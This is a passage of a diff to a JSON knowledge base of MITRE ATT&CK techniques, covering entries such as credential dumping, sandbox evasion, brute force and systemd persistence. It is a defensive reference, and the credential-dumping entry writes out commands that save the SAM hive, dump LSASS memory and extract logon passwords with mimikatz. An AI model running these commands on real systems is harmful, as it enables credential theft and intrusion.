is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\n * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.\n\nUnlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.", "meta": { "external_id": "T1189", "kill_chain": [ @@ -7068,7 +7469,7 @@ "value": "Drive-by Compromise - T1189" }, { - "description": "As described by [ATT&CK for Enterprise](https://attack.mitre.org/techniques/T1189), a drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is targeted for exploitation. For example, a website may contain malicious media content intended to exploit vulnerabilities in media parsers as demonstrated by the Android Stagefright vulnerability (Citation: Zimperium-Stagefright).\n\n(This technique was formerly known as Malicious Web Content. It has been renamed to better align with ATT&CK for Enterprise.)", + "description": "As described by [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), a drive-by compromise is when an adversary gains access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is targeted for exploitation. For example, a website may contain malicious media content intended to exploit vulnerabilities in media parsers as demonstrated by the Android Stagefright vulnerability (Citation: Zimperium-Stagefright).\n\n(This technique was formerly known as Malicious Web Content. It has been renamed to better align with ATT&CK for Enterprise.)", "meta": { "external_id": "CEL-22", "kill_chain": [ @@ -7129,6 +7530,34 @@ "uuid": "6063b486-a247-499b-976a-9de16f4e83bc", "value": "Develop KITs/KIQs - T1227" }, + { + "description": "Adversaries may check for the presence of a virtual machine environment (VME) or sandbox to avoid potential detection of tools and activities. If the adversary detects a VME, they may alter their malware to conceal the core functions of the implant or disengage from the victim. They may also search for VME artifacts before dropping secondary or additional payloads. \n\nAdversaries may use several methods including [Security Software Discovery](https://attack.mitre.org/techniques/T1063) to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) by searching for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) to help determine if it is an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandboxes. (Citation: Unit 42 Pirpi July 2015)\n\n###Virtual Machine Environment Artifacts Discovery###\n\nAdversaries may use utilities such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1086), [Systeminfo](https://attack.mitre.org/software/S0096), and the [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, and/or the Registry. Adversaries may use [Scripting](https://attack.mitre.org/techniques/T1064) to combine these checks into one script and then have the program exit if it determines the system to be a virtual environment. Also, in applications like VMWare, adversaries can use a special I/O port to send commands and receive output. Adversaries may also check the drive size. For example, this can be done using the Win32 DeviceIOControl function. \n\nExample VME Artifacts in the Registry(Citation: McAfee Virtual Jan 2017)\n\n* HKLM\\SOFTWARE\\Oracle\\VirtualBox Guest Additions\n* HKLM\\HARDWARE\\Description\\System\\”SystemBiosVersion”;”VMWARE”\n* HKLM\\HARDWARE\\ACPI\\DSDT\\BOX_\n\nExample VME files and DLLs on the system(Citation: McAfee Virtual Jan 2017)\n\n* WINDOWS\\system32\\drivers\\vmmouse.sys \n* WINDOWS\\system32\\vboxhook.dll\n* Windows\\system32\\vboxdisp.dll\n\nCommon checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017)\n\n###User Activity Discovery###\n\nAdversaries may search for user activity on the host (e.g., browser history, cache, bookmarks, number of files in the home directories, etc.) for reassurance of an authentic environment. They might detect this type of information via user interaction and digital signatures. They may have malware check the speed and frequency of mouse clicks to determine if it’s a sandboxed environment.(Citation: Sans Virtual Jan 2016) Other methods may rely on specific user interaction with the system before the malicious code is activated. Examples include waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) and waiting for a user to double click on an embedded image to activate (Citation: FireEye FIN7 April 2017).\n\n###Virtual Hardware Fingerprinting Discovery###\n\nAdversaries may check the fan and temperature of the system to gather evidence that can be indicative a virtual environment. An adversary may perform a CPU check using a WMI query $q = “Select * from Win32_Fan” Get-WmiObject -Query $q. If the results of the WMI query return more than zero elements, this might tell them that the machine is a physical one. (Citation: Unit 42 OilRig Sept 2018)", + "meta": { + "external_id": "T1497", + "kill_chain": [ + "mitre-attack:defense-evasion", + "mitre-attack:discovery" + ], + "mitre_data_sources": [ + "Process monitoring", + "Process command-line parameters" + ], + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1497", + "https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/", + "https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667", + "https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/", + "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html", + "https://researchcenter.paloaltonetworks.com/2018/09/unit42-oilrig-targets-middle-eastern-government-adds-evasion-techniques-oopsie/" + ] + }, + "uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "value": "Virtualization/Sandbox Evasion - T1497" + }, { "description": "Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, commingling legitimate traffic with C2 communications traffic, or using a non-standard data encoding system, such as a modified Base64 encoding for the message body of an HTTP request.", "meta": { @@ -7263,7 +7692,7 @@ "value": "Data Compressed - T1002" }, { - "description": "Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.\n\nSeveral of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.\n\n### Windows\n\n#### SAM (Security Accounts Manager)\n\nThe SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required.\n \nA number of tools can be used to retrieve the SAM file through in-memory techniques:\n\n* pwdumpx.exe \n* [gsecdump](https://attack.mitre.org/software/S0008)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n* secretsdump.py\n\nAlternatively, the SAM can be extracted from the Registry with [Reg](https://attack.mitre.org/software/S0075):\n\n* reg save HKLM\\sam sam\n* reg save HKLM\\system system\n\nCreddump7 can then be used to process the SAM database locally to retrieve hashes. (Citation: GitHub Creddump7)\n\nNotes:\nRid 500 account is the local, in-built administrator.\nRid 501 is the guest account.\nUser accounts start with a RID of 1,000+.\n\n#### Cached Credentials\n\nThe DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. This hash does not allow pass-the-hash style attacks.\n \nA number of tools can be used to retrieve the SAM file through in-memory techniques.\n\n* pwdumpx.exe \n* [gsecdump](https://attack.mitre.org/software/S0008)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n\nAlternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.\n\nNotes:\nCached credentials for Windows Vista are derived using PBKDF2.\n\n#### Local Security Authority (LSA) Secrets\n\nWith SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets.\n \nWhen services are run under the context of local or domain users, their passwords are stored in the Registry. If auto-logon is enabled, this information will be stored in the Registry as well.\n \nA number of tools can be used to retrieve the SAM file through in-memory techniques.\n\n* pwdumpx.exe \n* [gsecdump](https://attack.mitre.org/software/S0008)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n* secretsdump.py\n\nAlternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.\n\nNotes:\nThe passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext.\nWindows 10 adds protections for LSA Secrets described in Mitigation.\n\n#### NTDS from Domain Controller\n\nActive Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\\NTDS\\Ntds.dit of a domain controller. (Citation: Wikipedia Active Directory)\n \nThe following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.\n\n* Volume Shadow Copy\n* secretsdump.py\n* Using the in-built Windows tool, ntdsutil.exe\n* Invoke-NinjaCopy\n\n#### Group Policy Preference (GPP) Files\n\nGroup Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts.\n\nThese group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line. (Citation: Microsoft GPP Key) (Citation: SRD GPP)\n\nThe following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:\n\n* Metasploit’s post exploitation module: \"post/windows/gather/credentials/gpp\"\n* Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword)\n* gpprefdecrypt.py\n\nNotes:\nOn the SYSVOL share, the following can be used to enumerate potential XML files.\ndir /s * .xml\n\n#### Service Principal Names (SPNs)\n\nSee [Kerberoasting](https://attack.mitre.org/techniques/T1208).\n\n#### Plaintext Credentials\n\nAfter a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. These credentials can be harvested by a administrative user or SYSTEM.\n\nSSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to applications.\n\nThe following SSPs can be used to access credentials:\n\nMsv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.\nWdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection)\nKerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.\nCredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services. (Citation: Microsoft CredSSP)\n \nThe following tools can be used to enumerate credentials:\n\n* [Windows Credential Editor](https://attack.mitre.org/software/S0005)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n\nAs well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.\n\nFor example, on the target host use procdump:\n* procdump -ma lsass.exe lsass_dump\n\nLocally, mimikatz can be run:\n\n* sekurlsa::Minidump lsassdump.dmp\n* sekurlsa::logonPasswords\n\n#### DCSync\n\nDCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1097) (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098). (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the \"lsadump\" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017)\n\n### Linux\n\n#### Proc filesystem\n\nThe /proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. This functionality has been implemented in the [MimiPenguin](https://attack.mitre.org/software/S0179), an open source tool inspired by [Mimikatz](https://attack.mitre.org/software/S0002). The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.", + "description": "Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.\n\nSeveral of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.\n\n### Windows\n\n#### SAM (Security Accounts Manager)\n\nThe SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required.\n \nA number of tools can be used to retrieve the SAM file through in-memory techniques:\n\n* pwdumpx.exe \n* [gsecdump](https://attack.mitre.org/software/S0008)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n* secretsdump.py\n\nAlternatively, the SAM can be extracted from the Registry with [Reg](https://attack.mitre.org/software/S0075):\n\n* reg save HKLM\\sam sam\n* reg save HKLM\\system system\n\nCreddump7 can then be used to process the SAM database locally to retrieve hashes. (Citation: GitHub Creddump7)\n\nNotes:\nRid 500 account is the local, in-built administrator.\nRid 501 is the guest account.\nUser accounts start with a RID of 1,000+.\n\n#### Cached Credentials\n\nThe DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. This hash does not allow pass-the-hash style attacks.\n \nA number of tools can be used to retrieve the SAM file through in-memory techniques.\n\n* pwdumpx.exe \n* [gsecdump](https://attack.mitre.org/software/S0008)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n\nAlternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.\n\nNotes:\nCached credentials for Windows Vista are derived using PBKDF2.\n\n#### Local Security Authority (LSA) Secrets\n\nWith SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets.\n \nWhen services are run under the context of local or domain users, their passwords are stored in the Registry. If auto-logon is enabled, this information will be stored in the Registry as well.\n \nA number of tools can be used to retrieve the SAM file through in-memory techniques.\n\n* pwdumpx.exe \n* [gsecdump](https://attack.mitre.org/software/S0008)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n* secretsdump.py\n\nAlternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.\n\nNotes:\nThe passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext.\nWindows 10 adds protections for LSA Secrets described in Mitigation.\n\n#### NTDS from Domain Controller\n\nActive Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\\NTDS\\Ntds.dit of a domain controller. (Citation: Wikipedia Active Directory)\n \nThe following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.\n\n* Volume Shadow Copy\n* secretsdump.py\n* Using the in-built Windows tool, ntdsutil.exe\n* Invoke-NinjaCopy\n\n#### Group Policy Preference (GPP) Files\n\nGroup Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts.\n\nThese group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line. (Citation: Microsoft GPP Key) (Citation: SRD GPP)\n\nThe following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:\n\n* Metasploit’s post exploitation module: \"post/windows/gather/credentials/gpp\"\n* Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword)\n* gpprefdecrypt.py\n\nNotes:\nOn the SYSVOL share, the following can be used to enumerate potential XML files.\ndir /s * .xml\n\n#### Service Principal Names (SPNs)\n\nSee [Kerberoasting](https://attack.mitre.org/techniques/T1208).\n\n#### Plaintext Credentials\n\nAfter a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. These credentials can be harvested by a administrative user or SYSTEM.\n\nSSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to applications.\n\nThe following SSPs can be used to access credentials:\n\nMsv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.\nWdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection)\nKerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.\nCredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services. (Citation: Microsoft CredSSP)\n \nThe following tools can be used to enumerate credentials:\n\n* [Windows Credential Editor](https://attack.mitre.org/software/S0005)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n\nAs well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.\n\nFor example, on the target host use procdump:\n\n* procdump -ma lsass.exe lsass_dump\n\nLocally, mimikatz can be run:\n\n* sekurlsa::Minidump lsassdump.dmp\n* sekurlsa::logonPasswords\n\n#### DCSync\n\nDCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1097) (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098). (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the \"lsadump\" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017)\n\n### Linux\n\n#### Proc filesystem\n\nThe /proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. This functionality has been implemented in the [MimiPenguin](https://attack.mitre.org/software/S0179), an open source tool inspired by [Mimikatz](https://attack.mitre.org/software/S0002). The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.", "meta": { "external_id": "CAPEC-567", "kill_chain": [ @@ -7283,31 +7712,31 @@ "refs": [ "https://attack.mitre.org/techniques/T1003", "https://capec.mitre.org/data/definitions/567.html", - "https://github.com/mattifestation/PowerSploit", - "http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/", - "https://adsecurity.org/?p=1729", - "https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump", - "https://msdn.microsoft.com/library/cc228086.aspx", - "https://msdn.microsoft.com/library/dd207691.aspx", - "https://wiki.samba.org/index.php/DRSUAPI", - "https://source.winehq.org/WineAPI/samlib.html", - "https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM", - "https://msdn.microsoft.com/library/cc245496.aspx", - "https://msdn.microsoft.com/library/cc237008.aspx", "https://github.com/Neohapsis/creddump7", "https://en.wikipedia.org/wiki/Active_Directory", "https://msdn.microsoft.com/library/cc422924.aspx", "http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx", + "https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html", "https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-vista/cc749211(v=ws.10)", - "https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html" + "https://msdn.microsoft.com/library/cc228086.aspx", + "https://msdn.microsoft.com/library/dd207691.aspx", + "https://wiki.samba.org/index.php/DRSUAPI", + "https://source.winehq.org/WineAPI/samlib.html", + "https://adsecurity.org/?p=1729", + "http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/", + "https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM", + "https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump", + "https://msdn.microsoft.com/library/cc237008.aspx", + "https://github.com/mattifestation/PowerSploit", + "https://msdn.microsoft.com/library/cc245496.aspx" ] }, "uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "value": "Credential Dumping - T1003" }, { - "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning](https://attack.mitre.org/techniques/T1171), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (ex: IP addressing, hostnames, VLAN IDs) necessary for follow-on Lateral Movement and/or Defense Evasion activities.", + "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and Relay](https://attack.mitre.org/techniques/T1171), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (ex: IP addressing, hostnames, VLAN IDs) necessary for follow-on Lateral Movement and/or Defense Evasion activities.", "meta": { "external_id": "CAPEC-158", "kill_chain": [ @@ -7442,7 +7871,7 @@ "value": "Connection Proxy - T1090" }, { - "description": "Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained.\n\n[Credential Dumping](https://attack.mitre.org/techniques/T1003) to obtain password hashes may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1075) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table. Cracking hashes is usually done on adversary-controlled systems outside of the target network. (Citation: Wikipedia Password cracking)\n\nAdversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)\n\nA related technique called password spraying uses one password, or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)", + "description": "Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained.\n\n[Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1075) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network. (Citation: Wikipedia Password cracking)\n\nAdversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)\n\nA related technique called password spraying uses one password (e.g. 'Password01'), or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)\n\nTypically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.", "meta": { "external_id": "T1110", "kill_chain": [ @@ -7460,7 +7889,8 @@ "https://attack.mitre.org/techniques/T1110", "https://en.wikipedia.org/wiki/Password_cracking", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf", - "http://www.blackhillsinfosec.com/?p=4645" + "http://www.blackhillsinfosec.com/?p=4645", + "https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing" ] }, "uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", @@ -7568,7 +7998,7 @@ "value": "AppInit DLLs - T1103" }, { - "description": "A port monitor can be set through the (Citation: AddMonitor) API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. The Registry key contains entries for the following:\n* Local Port\n* Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n\nAdversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.", + "description": "A port monitor can be set through the (Citation: AddMonitor) API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. \n\nThe Registry key contains entries for the following:\n\n* Local Port\n* Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n\nAdversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.", "meta": { "external_id": "T1013", "kill_chain": [ @@ -7623,7 +8053,7 @@ "value": "Accessibility Features - T1015" }, { - "description": "Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UT-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as /Library/Preferences (which execute with elevated privileges) and ~/Library/Preferences (which execute with a user's privileges). \nAdversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism. (Citation: Sofacy Komplex Trojan)", + "description": "Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as /Library/Preferences (which execute with elevated privileges) and ~/Library/Preferences (which execute with a user's privileges). \nAdversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism. (Citation: Sofacy Komplex Trojan)", "meta": { "external_id": "T1150", "kill_chain": [ @@ -7647,6 +8077,35 @@ "uuid": "06780952-177c-4247-b978-79c357fb311f", "value": "Plist Modification - T1150" }, + { + "description": "Systemd services can be used to establish persistence on a Linux system. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.\n\nSystemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the /etc/systemd/system and /usr/lib/systemd/system directories and have the file extension .service. Each service unit file may contain numerous directives that can execute system commands. \n\n* ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start. \n* ExecReload directive covers when a service restarts. \n* ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.\n\nAdversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at recurring intervals, such as at system boot.(Citation: Anomali Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018)\n\nWhile adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)", + "meta": { + "external_id": "T1501", + "kill_chain": [ + "mitre-attack:persistence" + ], + "mitre_data_sources": [ + "Process command-line parameters", + "Process monitoring", + "File monitoring" + ], + "mitre_platforms": [ + "Linux" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1501", + "http://man7.org/linux/man-pages/man1/systemd.1.html", + "https://www.freedesktop.org/wiki/Software/systemd/", + "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang", + 